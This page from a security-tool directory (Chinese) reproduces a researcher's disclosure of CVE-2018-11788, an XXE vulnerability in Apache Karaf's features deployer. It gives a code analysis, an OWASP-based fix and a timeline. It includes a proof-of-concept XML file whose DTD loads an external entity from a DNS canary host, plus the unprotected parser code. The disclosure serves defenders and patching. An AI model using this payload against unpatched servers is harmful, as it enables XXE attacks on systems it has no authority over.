Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-11788 — Apache Karaf XXE 漏洞 (CVE-2018-11788) | Kitploit
工具/GitHubGitHub/brianwrf/cve-2018-11788
漏洞分析代码分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubbrianwrf/cve-2018-11788

CVE-2018-11788

Apache Karaf XXE 漏洞 (CVE-2018-11788)

查看仓库
3767年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概述

Apache Karaf 是一个现代且多态的应用容器。它是一个由 OSGi 提供支持的轻量级、功能强大且企业就绪的容器。Apache Karaf 是一个"产品项目",提供完整且开箱即用的运行时。该运行时是"多面"的,这意味着你可以部署不同类型的应用:OSGi 或非 OSGi、Web 应用、基于服务的应用等。

在最近对 Apache Karaf 的研究中,我发现在其 XML 解析器上存在一些 XXE(XML 外部实体注入)漏洞。该问题是由于解析器未正确解析 XML 文档所致。

受影响版本

  • Apache Karaf <= 4.2.1
  • Apache Karaf <= 4.1.6

分析

根据官方手册,Apache Karaf 默认提供一个 features 部署器,允许用户通过将文件直接放入 deploy 文件夹来"热部署" features XML。

当你在 deploy 文件夹中放入 features XML 时,features 部署器会:

  • 将 features XML 注册为 features 仓库
  • install 属性设置为 "auto" 的 features 将被 features 部署器自动安装。

例如,将以下 XML 放入 deploy 文件夹将自动安装 feature1 和 feature2,而 feature3 不会被安装:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">

    <feature name="feature1" version="1.0" install="auto">
        ...
    </feature>

    <feature name="feature2" version="1.0" install="auto">
        ...
    </feature>

    <feature name="feature3" version="1.0">
        ...
    </feature>

</features>

为了了解部署器如何处理 XML 文件,我查看了 Github 上的 Karaf 源代码,并发现了如下的调用链:

  • Activator 类调用 doStart() 函数来为部署器启动一个监听器
  • doStart() 函数调用 FeatureDeploymentListener.init() 来初始化一个监听器
  • 然后它会依次调用 bundleChanged - canHandle - getRootElementName 函数,借助 XMLInputFactory 来解析 XML 文档

但是,进一步研究下面的 getRootElementName 函数后,发现没有任何针对 XXE 的防护措施。

root@kitploit:~
private QName getRootElementName(File artifact) throws Exception {
    if (xif == null) {
        xif = XMLInputFactory.newFactory();
        xif.setProperty(XMLInputFactory.IS_NAMESPACE_AWARE, true);
    }
    try (InputStream is = new FileInputStream(artifact)) {
        XMLStreamReader sr = xif.createXMLStreamReader(is);
        sr.nextTag();
        return sr.getName();
    }
}

因此,我推测这对 Apache Karaf 构成了潜在的安全风险。

概念验证

为了验证我的推测,我在从 https://karaf.apache.org/download.html 下载的最新官方版本 Apache Karaf 4.2.0 上进行了如下测试。

  1. 从 Apache Karaf 4.2.0 下载二进制发行版
  2. 解压软件包并进入 bin 文件夹以启动 Karaf 命令控制台,如下所示
root@kitploit:~
  bin$ ./karaf
          __ __                  ____      
         / //_/____ __________ _/ __/      
        / ,<  / __ `/ ___/ __ `/ /_        
       / /| |/ /_/ / /  / /_/ / __/        
      /_/ |_|\__,_/_/   \__,_/_/         

    Apache Karaf (4.2.0)

  Hit '<tab>' for a list of available commands
  and '[cmd] --help' for help on a specific command.
  Hit '<ctrl-d>' or type 'system:shutdown' or 'logout' to shutdown Karaf.

  karaf@root()>
  1. 在 https://canarytokens.org/generate 上生成一个 DNS 令牌,例如 27av6zyg33g8q8xu338uvhnsc.canarytokens.com
  2. 制作一个 XML 文件,并在 DTD 中添加一个嵌入所生成 DNS 令牌的外部实体,如下所示:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
    <feature name="deployer" version="2.0" install="auto">
    </feature>
</features>
  1. 将制作好的 XML 文件复制到 deploy 文件夹下
root@kitploit:~
apache-karaf-4.2.0$ cd deploy/
deploy$ tree
.
├── README
└── poc.xml
  1. 等待一段时间,然后你会看到来自你测试机器的 DNS 请求,这意味着 XML 解析器正在尝试加载 DTD 中嵌入的外部实体

缓解措施

请遵循下面的 OWASP 指南,其中提供了防止此漏洞的简明信息。 https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Java

例如,在 getRootElementName 函数中添加以下代码以禁用 DTD 和外部实体。

root@kitploit:~
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false); // This disables DTDs entirely for that factory
xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false); // disable external entities

附加信息

除了上述发现之外,我还发现 Apache Karaf 项目中的另一个类 XmlUtils 在解析 XML 文档时没有添加任何针对 XXE 漏洞的防护。

root@kitploit:~
package org.apache.karaf.util;

import java.io.File;
import java.io.IOException;
import java.io.InputStream;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;

import org.w3c.dom.Document;
import org.xml.sax.ErrorHandler;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;

/**
 * Utils class to manipulate XML document in a thread safe way.
 */
public class XmlUtils {

    private static final ThreadLocal<DocumentBuilderFactory> DOCUMENT_BUILDER_FACTORY = new ThreadLocal<>();
    private static final ThreadLocal<TransformerFactory> TRANSFORMER_FACTORY = new ThreadLocal<>();
    private static final ThreadLocal<SAXParserFactory> SAX_PARSER_FACTORY = new ThreadLocal<>();

    public static Document parse(String uri) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(uri);
        } finally {
            db.reset();
        }
    }

    public static Document parse(InputStream stream) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(stream);
        } finally {
            db.reset();
        }
    }

    public static Document parse(File f) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        try {
            return db.parse(f);
        } finally {
            db.reset();
        }
    }

    public static Document parse(File f, ErrorHandler errorHandler) throws TransformerException, IOException, SAXException, ParserConfigurationException {
        DocumentBuilder db = documentBuilder();
        db.setErrorHandler(errorHandler);
        try {
            return db.parse(f);
        } finally {
            db.reset();
        }
    }

    public static void transform(Source xmlSource, Result outputTarget) throws TransformerException {
        Transformer t = transformer();
        try {
            t.transform(xmlSource, outputTarget);
        } finally {
            t.reset();
        }
    }

    public static void transform(Source xsltSource, Source xmlSource, Result outputTarget) throws TransformerException {
        Transformer t = transformer(xsltSource);
        try {
            t.transform(xmlSource, outputTarget);
        } finally {
            t.reset();
        }
    }

    public static XMLReader xmlReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory spf = SAX_PARSER_FACTORY.get();
        if (spf == null) {
            spf = SAXParserFactory.newInstance();
            spf.setNamespaceAware(true);
            SAX_PARSER_FACTORY.set(spf);
        }
        return spf.newSAXParser().getXMLReader();
    }

    public static DocumentBuilder documentBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DOCUMENT_BUILDER_FACTORY.get();
        if (dbf == null) {
            dbf = DocumentBuilderFactory.newInstance();
            dbf.setNamespaceAware(true);
            DOCUMENT_BUILDER_FACTORY.set(dbf);
        }
        return dbf.newDocumentBuilder();
    }

    public static Transformer transformer() throws TransformerConfigurationException {
        TransformerFactory tf = TRANSFORMER_FACTORY.get();
        if (tf == null) {
            tf = TransformerFactory.newInstance();
            TRANSFORMER_FACTORY.set(tf);
        }
        return tf.newTransformer();
    }

    private static Transformer transformer(Source xsltSource) throws TransformerConfigurationException {
        TransformerFactory tf = TRANSFORMER_FACTORY.get();
        if (tf == null) {
            tf = TransformerFactory.newInstance();
            TRANSFORMER_FACTORY.set(tf);
        }
        return tf.newTransformer(xsltSource);
    }

}

时间线

  • 2018-08-22:将此问题报告给 Apache 安全团队。
  • 2018-09-26:Apache Karaf 团队确认并在 KARAF-5911 中修复了该问题。
  • 2018-11-30:Apache Karaf 4.1.7 随修复一起发布。
  • 2018-12-18:Apache Karaf 4.2.2 随修复一起发布。
  • 2019-01-06:Apache Karaf 就此问题发布了 CVE-2018-11788。

参考

  • https://karaf.apache.org/security/cve-2018-11788.txt
  • https://issues.apache.org/jira/browse/KARAF-5911
  • https://gitbox.apache.org/repos/asf?p=karaf.git;h=cc3332e
  • https://gitbox.apache.org/repos/asf?p=karaf.git;h=1ffa6d1
  • http://avfisher.win/archives/1052
下载工具